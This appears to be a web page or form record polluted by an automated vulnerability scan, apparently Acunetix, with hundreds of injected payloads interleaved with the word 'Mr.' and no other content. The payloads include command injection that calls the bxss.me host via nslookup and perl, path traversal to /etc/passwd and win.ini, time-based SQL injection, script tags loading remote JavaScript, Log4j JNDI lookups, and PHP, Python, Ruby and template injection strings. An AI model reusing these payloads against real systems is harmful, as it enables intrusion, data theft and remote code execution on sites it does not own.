<script>hNEo(9103)</script>

Mr.

$(nslookup hitfqaagcfpmdd507e.bxss.me||perl -e "gethostbyname('hitfqaagcfpmdd507e.bxss.me')")

Mr.

&#xD;&#xA;

Mr.

../
&#xD;&#xA;

Mr.

&(nslookup hitxmfdfjcien178bd.bxss.me||perl -e "gethostbyname('hitxmfdfjcien178bd.bxss.me')")&'\"`0&(nslookup hitxmfdfjcien178bd.bxss.me||perl -e "gethostbyname('hitxmfdfjcien178bd.bxss.me')")&`'

../../../../../../../../../../../../../../etc/passwd

&#xD;&#xA;

Mr.

<ScR<ScRiPt>IpT>hNEo(9694)</sCr<ScRiPt>IpT>

../../../../../../../../../../../../../../windows/win.ini

&#xD;&#xA;

Mr.

|(nslookup hitbussqvibaab22c2.bxss.me||perl -e "gethostbyname('hitbussqvibaab22c2.bxss.me')")

file:///etc/passwd

&#xD;&#xA;

Mr.

`(nslookup hitfahgdquvbxbb2e5.bxss.me||perl -e "gethostbyname('hitfahgdquvbxbb2e5.bxss.me')")`

Mr.

&#xD;&#xA;

Mr.

to@example.com>
bcc:074625.58-195505.58.edfe9.19244.2@bxss.me

../Mr.

&#xD;&#xA;

Mr. bcc:074625.58-195506.58.edfe9.19244.2@bxss.me

&#xD;&#xA;

Mr.

;(nslookup hitdwlvrcreou636a1.bxss.me||perl -e "gethostbyname('hitdwlvrcreou636a1.bxss.me')")|(nslookup hitdwlvrcreou636a1.bxss.me||perl -e "gethostbyname('hitdwlvrcreou636a1.bxss.me')")&(nslookup hitdwlvrcreou636a1.bxss.me||perl -e "gethostbyname('hitdwlvrcreou636a1.bxss.me')")

Mr.

&#xD;&#xA;<esi:include src="http://bxss.me/rpb.png"/>

to@example.com> bcc:074625.58-195508.58.edfe9.19244.2@bxss.me

&#xD;&#xA;

Mr.<esi:include src="http://bxss.me/rpb.png"/>

&#xD;&#xA;

echo qwajrq$()\ iigjba\nz^xyu||a #' &echo qwajrq$()\ iigjba\nz^xyu||a #|" &echo qwajrq$()\ iigjba\nz^xyu||a #

&#xD;&#xA;

Mr.

<ScRiPt
>hNEo(9980)</ScRiPt>

&echo fsktrm$()\ bgzxyb\nz^xyu||a #' &echo fsktrm$()\ bgzxyb\nz^xyu||a #|" &echo fsktrm$()\ bgzxyb\nz^xyu||a #

&#xD;&#xA;

Mr.

&#xD;&#xA;

|echo wwcuhh$()\ rozmlz\nz^xyu||a #' |echo wwcuhh$()\ rozmlz\nz^xyu||a #|" |echo wwcuhh$()\ rozmlz\nz^xyu||a #

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

(nslookup hittmfhwrjdqod12fb.bxss.me||perl -e "gethostbyname('hittmfhwrjdqod12fb.bxss.me')")

&#xD;&#xA;

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

${9999592+9999525}

$(nslookup hitvnctqktwws3f0e5.bxss.me||perl -e "gethostbyname('hitvnctqktwws3f0e5.bxss.me')")

&#xD;&#xA;

${10000012+10000243}

&#xD;&#xA;

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

&(nslookup hitmlgluxwgrw3d82e.bxss.me||perl -e "gethostbyname('hitmlgluxwgrw3d82e.bxss.me')")&'\"`0&(nslookup hitmlgluxwgrw3d82e.bxss.me||perl -e "gethostbyname('hitmlgluxwgrw3d82e.bxss.me')")&`'

&#xD;&#xA;

Mr.

&#xD;&#xA;&n905689=v957364

Mr.

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9897></ScRiPt>

Mr.

Http://bxss.me/t/fit.txt

|(nslookup hitwxmyxnddose153b.bxss.me||perl -e "gethostbyname('hitwxmyxnddose153b.bxss.me')")

&#xD;&#xA;

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

)

Mr.

/etc/shells

`(nslookup hitagiwfyhtmh9d440.bxss.me||perl -e "gethostbyname('hitagiwfyhtmh9d440.bxss.me')")`

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

!(()&&!|*|*|

Mr.

c:/windows/win.ini

Mr.&n958156=v977459

&#xD;&#xA;

Mr.

'"()

Mr.

^(#$!@#$)(()))******

Mr.

bxss.me

Mr.

&#xD;&#xA;

)

&#xD;&#xA;

Mr.

&#xD;&#xA;

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.

&#xD;&#xA;

Mr.

<isindex type=image src=1 onerror=hNEo(9810)>

!(()&&!|*|*|

&#xD;&#xA;

Mr.

&#xD;&#xA;

^(#$!@#$)(()))******

&#xD;&#xA;

Http://bxss.me/t/fit.txt

&#xD;&#xA;

http://bxss.me/t/fit.txt?.

&#xD;&#xA;

/etc/shells

&#xD;&#xA;

Mr.

&#xD;&#xA;'&&sleep(27*1000)*iljmmk&&'

Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9548'>

Mr.

'.gethostbyname(lc('hitlo'.'krlmurgp421bf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(76).chr(105).chr(77).'

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

c:/windows/win.ini

&#xD;&#xA;

Mr.

&#xD;&#xA;"&&sleep(27*1000)*kmrnrs&&"

Mr.

';print(md5(31337));$a='

Mr.

&#xD;&#xA;'||sleep(27*1000)*oujkkp||'

bxss.me

&#xD;&#xA;

Mr.

".gethostbyname(lc("hitkj"."vbwvnbgc42a4b.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(72).chr(98).chr(74)."

Mr.

&#xD;&#xA;"||sleep(27*1000)*ffsmxv||"

Mr.

<body onload=hNEo(9249)>

Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

Mr.

";print(md5(31337));$a="

'.gethostbyname(lc('hituy'.'gdetujyd51a68.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(90).chr(97).chr(86).'

&#xD;&#xA;

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitsugxwfrteh20280.'+'bxss.me')

Mr.

${@print(md5(31337))}

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitsugxwfrteh20280."+"bxss.me")+'

".gethostbyname(lc("hitnh"."grurkmoob7264.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(70).chr(109).chr(89)."

&#xD;&#xA;

Mr.

${@print(md5(31337))}\

Mr.

<img src=//xss.bxss.me/t/dot.gif onload=hNEo(9472)>

'"()

&#xD;&#xA;

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitsugxwfrteh20280.'+'bxss.me')+"

Mr.

'.print(md5(31337)).'

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitcgtrewqhskdf320.'+'bxss.me')

&#xD;&#xA;

Mr.

&#xD;&#xA;

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

&#xD;&#xA;

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitcgtrewqhskdf320."+"bxss.me")+'

&#xD;&#xA;

';print(md5(31337));$a='

&#xD;&#xA;

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitcgtrewqhskdf320.'+'bxss.me')+"

&#xD;&#xA;

";print(md5(31337));$a="

&#xD;&#xA;

${@print(md5(31337))}

&#xD;&#xA;

Mr.

<img src=xyz OnErRor=hNEo(9638)>

${@print(md5(31337))}\

&#xD;&#xA;

Mr.'&&sleep(27*1000)*lbktol&&'

&#xD;&#xA;

'.print(md5(31337)).'

&#xD;&#xA;

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

bxss.me/t/xss.html?%00

Mr."&&sleep(27*1000)*logxsy&&"

&#xD;&#xA;

HttP://bxss.me/t/xss.html?%00

&#xD;&#xA;

Mr.'||sleep(27*1000)*hpselx||'

&#xD;&#xA;

Mr.

<img/src=">" onerror=alert(9889)>

bxss.me/t/xss.html?%00

&#xD;&#xA;

Mr."||sleep(27*1000)*jnfese||"

&#xD;&#xA;

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%68%4E%45%6F%289126%29%3C%2F%73%43%72%69%70%54%3E

Mr.

&#xD;&#xA;

Mr.

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7

Mr.

"+"A".concat(70-3).concat(22*4).concat(107).concat(72).concat(118).concat(76)+(require"socket"
Socket.gethostbyname("hitxy"+"ckkvmexicecc2.bxss.me.")[3].to_s)+"

Mr.

'+'A'.concat(70-3).concat(22*4).concat(104).concat(87).concat(120).concat(80)+(require'socket'
Socket.gethostbyname('hittz'+'isbhaegzb8050.bxss.me.')[3].to_s)+'

Mr.

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7/.

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7

&#xD;&#xA;

"+"A".concat(70-3).concat(22*4).concat(112).concat(68).concat(102).concat(76)+(require"socket" Socket.gethostbyname("hitlj"+"eixsxatq37bec.bxss.me.")[3].to_s)+"

&#xD;&#xA;

Mr.

http://hitmoxeupyoyv.bxss.me/

Mr.

\u003CScRiPt\hNEo(9884)\u003C/sCripT\u003E

'+'A'.concat(70-3).concat(22*4).concat(120).concat(79).concat(106).concat(78)+(require'socket' Socket.gethostbyname('hitii'+'thpuesgl6e521.bxss.me.')[3].to_s)+'

&#xD;&#xA;

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7/.

&#xD;&#xA;

http://hitifvxpubvlq.bxss.me/

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

&lt;ScRiPt&gt;hNEo(9985)&lt;/sCripT&gt;

Mr.

-1 OR 2+479-479-1=0+0+0+1 --

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&#xD;&#xA;

Mr.

-1 OR 2+364-364-1=0+0+0+1

Mr.

&#xD;&#xA;

Mr.

/xfs.bxss.me

Mr.

-1' OR 2+697-697-1=0+0+0+1 --

Mr.

&#xD;&#xA;

/xfs.bxss.me

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

-1' OR 2+661-661-1=0+0+0+1 or '9oeTP58a'='

Mr.

'"

Mr.

&#xD;&#xA;

Mr.

%F6<img zzz onmouseover=hNEo(96481) //%F6>

Mr.

-1" OR 2+320-320-1=0+0+0+1 --

Mr.

&#xD;&#xA;

Mr.

<!--

'"

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;'"()&%<zzz><ScRiPt >k0if(9798)</ScRiPt>

<!--

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

<input autofocus onfocus=hNEo(9407)>

Mr.

'"()&%<zzz><ScRiPt >k0if(9504)</ScRiPt>

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

&#xD;&#xA;9402886

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

bfg9366<s1﹥s2ʺs3ʹhjl9366

Mr.

}body{zzz:Expre/**/SSion(hNEo(9610))}

Mr.

-1; waitfor delay '0:0:15' --

Mr.

PRXwJ
<ScRiPt >hNEo(9189)</ScRiPt>

Mr.

bfgx4429%C0%BEz1%C0%BCz2a%90bcxhjl4429

Mr.

<WQZVLH>VWI1L[!+!]</WQZVLH>

Mr.

<%={{={@{#{${dfb}}%>

Mr.

<ifRAme sRc=9210.com></IfRamE>

Mr.

<th:t="${dfb}#foreach

Mr.

<aeYSGVG x=9828>

Mr.

<img sRc='http://attacker-9220/log.php?

Mr.

${j${::-n}di:dns${::-:}${::-/}/hitfnojpgebqsd202d${::-.}bxss.me}zzzz

Mr.

response.write(9682551*9962493)

Mr.

'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-195809&h=58-edfe9-2&"></script>

Mr.

'+response.write(9682551*9962493)+'

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitgajnjbnlao0ff1a${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

"+response.write(9682551*9962493)+"

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-195811.58.edfe9${::-.}1${::-.}bxss.me}}

Mr.

<ablsn17<

Mr.

dfb{{98991*97996}}xca

Mr.

echo czponp$()\ pweycl\nz^xyu||a #' &echo czponp$()\ pweycl\nz^xyu||a #|" &echo czponp$()\ pweycl\nz^xyu||a #

Mr.

WIZi1C1n

Mr.

&echo bdomjm$()\ uhcllb\nz^xyu||a #' &echo bdomjm$()\ uhcllb\nz^xyu||a #|" &echo bdomjm$()\ uhcllb\nz^xyu||a #

Mr.

dfb[[${98991*97996}]]xca

Mr.

|echo ttjqli$()\ wqlsrh\nz^xyu||a #' |echo ttjqli$()\ wqlsrh\nz^xyu||a #|" |echo ttjqli$()\ wqlsrh\nz^xyu||a #

Mr.

(nslookup hitgjfietnnkza6795.bxss.me||perl -e "gethostbyname('hitgjfietnnkza6795.bxss.me')")

Mr.

dfb__${98991*97996}__::.x

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

$(nslookup hitdpmdorzaom37370.bxss.me||perl -e "gethostbyname('hitdpmdorzaom37370.bxss.me')")

Mr.

bcc:074625.58-195814.58.edfe9.19244.2@bxss.me

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

to@example.com>
bcc:074625.58-195815.58.edfe9.19244.2@bxss.me

Mr.

&(nslookup hitswicuviubxde3b1.bxss.me||perl -e "gethostbyname('hitswicuviubxde3b1.bxss.me')")&'\"`0&(nslookup hitswicuviubxde3b1.bxss.me||perl -e "gethostbyname('hitswicuviubxde3b1.bxss.me')")&`'

Mr.

file:///etc/passwd

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

|(nslookup hitkmezhjqkre9ba02.bxss.me||perl -e "gethostbyname('hitkmezhjqkre9ba02.bxss.me')")

Mr.

&#xD;&#xA;<ScRiPt >k0if(9536)</ScRiPt>

Mr.

../

Mr.

`(nslookup hitukmtdfhoaq8830f.bxss.me||perl -e "gethostbyname('hitukmtdfhoaq8830f.bxss.me')")`

Mr.

./

Mr.

<esi:include src="http://bxss.me/rpb.png"/>

Mr.

;(nslookup hitsxnujanyxfc1488.bxss.me||perl -e "gethostbyname('hitsxnujanyxfc1488.bxss.me')")|(nslookup hitsxnujanyxfc1488.bxss.me||perl -e "gethostbyname('hitsxnujanyxfc1488.bxss.me')")&(nslookup hitsxnujanyxfc1488.bxss.me||perl -e "gethostbyname('hitsxnujanyxfc1488.bxss.me')")

Mr.

${9999184+9999156}

Mr.

&#xD;&#xA;<WDHDNW>AFBVS[!+!]</WDHDNW>

Mr.

-1); waitfor delay '0:0:15' --

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Mr.

&n970652=v955939

Mr.

)

Mr.

!(()&&!|*|*|

Mr.

Http://bxss.me/t/fit.txt

Mr.

^(#$!@#$)(()))******

Mr.

&#xD;&#xA;<ScRiPt
>k0if(9737)</ScRiPt>

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

/etc/shells

Mr.

c:/windows/win.ini

Mr.

bxss.me

Mr.

&#xD;&#xA;<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9591></ScRiPt>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

'"()

Mr.

&#xD;&#xA;<isindex type=image src=1 onerror=k0if(9039)>

Mr.

'.gethostbyname(lc('hitjt'.'vznvkbkw385d7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(82).chr(111).chr(66).'

Mr.

'&&sleep(27*1000)*zcplxa&&'

Mr.

&#xD;&#xA;<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9929'>

Mr.

".gethostbyname(lc("hitnm"."tnnduflzded4c.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(80).chr(103).chr(87)."

Mr.

"&&sleep(27*1000)*gfcpmf&&"

Mr.

'||sleep(27*1000)*jxmamk||'

Mr.

"||sleep(27*1000)*gbjkde||"

Mr.

&#xD;&#xA;<body onload=k0if(9763)>

Mr.

&#xD;&#xA;<img src=//xss.bxss.me/t/dot.gif onload=k0if(9209)>

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

';print(md5(31337));$a='

Mr.

";print(md5(31337));$a="

Mr.

&#xD;&#xA;<img src=xyz OnErRor=k0if(9534)>

Mr.

${@print(md5(31337))}

Mr.

${@print(md5(31337))}\

Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

Mr.

&#xD;&#xA;<img/src=">" onerror=alert(9532)>

Mr.

'.print(md5(31337)).'

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitjxggvnyhhfd7435.'+'bxss.me')

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitjxggvnyhhfd7435."+"bxss.me")+'

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitjxggvnyhhfd7435.'+'bxss.me')+"

Mr.

-1)); waitfor delay '0:0:15' --

Mr.

%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%6B%30%69%66%289258%29%3C%2F%73%43%72%69%70%54%3E

Mr.

&#xD;&#xA;&lt;ScRiPt&gt;k0if(9003)&lt;/sCripT&gt;

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

-1 OR 2+665-665-1=0+0+0+1 --

Mr.

bxss.me/t/xss.html?%00

Mr.

%F6<img zzz onmouseover=k0if(94361) //%F6>

Mr.

"+"A".concat(70-3).concat(22*4).concat(105).concat(65).concat(98).concat(66)+(require"socket"
Socket.gethostbyname("hitaz"+"idethkyq96802.bxss.me.")[3].to_s)+"

Mr.

-1 OR 3+665-665-1=0+0+0+1 --

Mr.

-1 OR 2+361-361-1=0+0+0+1

Mr.

'+'A'.concat(70-3).concat(22*4).concat(115).concat(88).concat(97).concat(71)+(require'socket'
Socket.gethostbyname('hitso'+'fgjhxrhq7cf21.bxss.me.')[3].to_s)+'

Mr.

&#xD;&#xA;<input autofocus onfocus=k0if(9748)>

Mr.

-1 OR 3+361-361-1=0+0+0+1

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7

Mr.

-1' OR 2+463-463-1=0+0+0+1 --

Mr.

-1' OR 3+463-463-1=0+0+0+1 --

Mr.

%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A3%D9%84%D8%B9%D8%A7%D8%A8-bioshock-%D8%B3%D8%AA%D8%AD%D8%B5%D9%84-%D8%B9%D9%84%D9%89-%D9%81%D9%8A%D9%84%D9%85-%D9%85%D8%AE%D8%B5%D8%B5-%D9%84%D9%87%D8%A7/.

Mr.

http://hitwkwgxuahdp.bxss.me/

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

-1' OR 2+413-413-1=0+0+0+1 or '3kxv4M16'='

Mr.

-1' OR 3+413-413-1=0+0+0+1 or '3kxv4M16'='

Mr.

-1" OR 2+817-817-1=0+0+0+1 --

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

-1" OR 3+817-817-1=0+0+0+1 --

Mr.

&#xD;&#xA;}body{zzz:Expre/**/SSion(k0if(9336))}

Mr.

/xfs.bxss.me

Mr.

'"

Mr.

<!--

Mr.

'"()&%<zzz><ScRiPt >3URB(9554)</ScRiPt>

Mr.

&#xD;&#xA;aREoD
<ScRiPt >k0if(9941)</ScRiPt>

Mr.

'"()&%<zzz><ScRiPt >3URB(9569)</ScRiPt>

Mr.

&#xD;&#xA;<WDPWBS>FBOA9[!+!]</WDPWBS>

Mr.

&#xD;&#xA;<ifRAme sRc=9829.com></IfRamE>

Mr.

9681737

Mr.

&#xD;&#xA;<ax1yN2U x=9713>

Mr.

bfg7568<s1﹥s2ʺs3ʹhjl7568

Mr.

1 waitfor delay '0:0:15' --

Mr.

&#xD;&#xA;<img sRc='http://attacker-9355/log.php?

Mr.

bfgx3925%C0%BEz1%C0%BCz2a%90bcxhjl3925

Mr.

&#xD;&#xA;<a9P5tRX<

Mr.

<%={{={@{#{${dfb}}%>

Mr.'"()&%<zzz><ScRiPt >k0if(9802)</ScRiPt>

&#xD;&#xA;

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

<th:t="${dfb}#foreach

'"()&%<zzz><ScRiPt >k0if(9464)</ScRiPt>

&#xD;&#xA;

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.9578463

&#xD;&#xA;

Mr.

dfb{{98991*97996}}xca

Mr.

if(now()=sysdate(),sleep(15),0)

bfg9576<s1﹥s2ʺs3ʹhjl9576

&#xD;&#xA;

Mr.

dfb[[${98991*97996}]]xca

Mr.

dfb__${98991*97996}__::.x

bfgx10305%C0%BEz1%C0%BCz2a%90bcxhjl10305

&#xD;&#xA;

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<%={{={@{#{${dfb}}%>

&#xD;&#xA;

Mr.

<ScRiPt >3URB(9908)</ScRiPt>

<th:t="${dfb}#foreach

&#xD;&#xA;

Mr.

<WRMT7H>4DYGM[!+!]</WRMT7H>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

&#xD;&#xA;

Mr.

A7low6nm'; waitfor delay '0:0:15' --

dfb{{98991*97996}}xca

&#xD;&#xA;

Mr.

<script>3URB(9500)</script>

dfb[[${98991*97996}]]xca

&#xD;&#xA;

Mr.

<ScR<ScRiPt>IpT>3URB(9595)</sCr<ScRiPt>IpT>

dfb__${98991*97996}__::.x

&#xD;&#xA;

Mr.

<ScRiPt
>3URB(9112)</ScRiPt>

Mr.

1 waitfor delay '0:0:15' --

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

&#xD;&#xA;

Mr.

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9220></ScRiPt>

Mr.<ScRiPt >k0if(9162)</ScRiPt>

&#xD;&#xA;

Mr.<WW0KA9>G1J73[!+!]</WW0KA9>

&#xD;&#xA;

Mr.

<isindex type=image src=1 onerror=3URB(9711)>

Mr.<script>k0if(9181)</script>

&#xD;&#xA;

Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9205'>

Mr.<ScR<ScRiPt>IpT>k0if(9770)</sCr<ScRiPt>IpT>

&#xD;&#xA;

Mr.

<body onload=3URB(9478)>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.<ScRiPt >k0if(9005)</ScRiPt>

&#xD;&#xA;

Mr.

<img src=//xss.bxss.me/t/dot.gif onload=3URB(9348)>

Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9079></ScRiPt>

&#xD;&#xA;

Mr.

<img src=xyz OnErRor=3URB(9422)>

Mr.

<img/src=">" onerror=alert(9615)>

Mr.<isindex type=image src=1 onerror=k0if(9250)>

&#xD;&#xA;

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9693'>

&#xD;&#xA;

Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%33%55%52%42%289838%29%3C%2F%73%43%72%69%70%54%3E

Mr.

P8U6w9vS'); waitfor delay '0:0:15' --

Mr.

\u003CScRiPt\3URB(9605)\u003C/sCripT\u003E

Mr.<body onload=k0if(9021)>

&#xD;&#xA;

Mr.

&lt;ScRiPt&gt;3URB(9722)&lt;/sCripT&gt;

Mr.<img src=//xss.bxss.me/t/dot.gif onload=k0if(9356)>

&#xD;&#xA;

Mr.

%F6<img zzz onmouseover=3URB(97331) //%F6>

Mr.

xgI8ANBU'; waitfor delay '0:0:15' --

Mr.<img src=xyz OnErRor=k0if(9170)>

&#xD;&#xA;

Mr.

<input autofocus onfocus=3URB(9130)>

Mr.<img/src=">" onerror=alert(9559)>

&#xD;&#xA;

Mr.

<a HrEF=http://xss.bxss.me></a>

%4D%72%2E%3C%53%63%52%69%50%74%20%3E%6B%30%69%66%289528%29%3C%2F%73%43%72%69%70%54%3E

&#xD;&#xA;

Mr.\u003CScRiPt\k0if(9946)\u003C/sCripT\u003E

&#xD;&#xA;

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

<a HrEF=jaVaScRiPT:>

Mr.&lt;ScRiPt&gt;k0if(9687)&lt;/sCripT&gt;

&#xD;&#xA;

Mr.

555

Mr.

}body{zzz:Expre/**/SSion(3URB(9377))}

%F6<img zzz onmouseover=k0if(97841) //%F6>

&#xD;&#xA;

Mr.

OQ3qd
<ScRiPt >3URB(9701)</ScRiPt>

Mr.<input autofocus onfocus=k0if(9476)>

&#xD;&#xA;

Mr.

<W5WVW4>2ORWJ[!+!]</W5WVW4>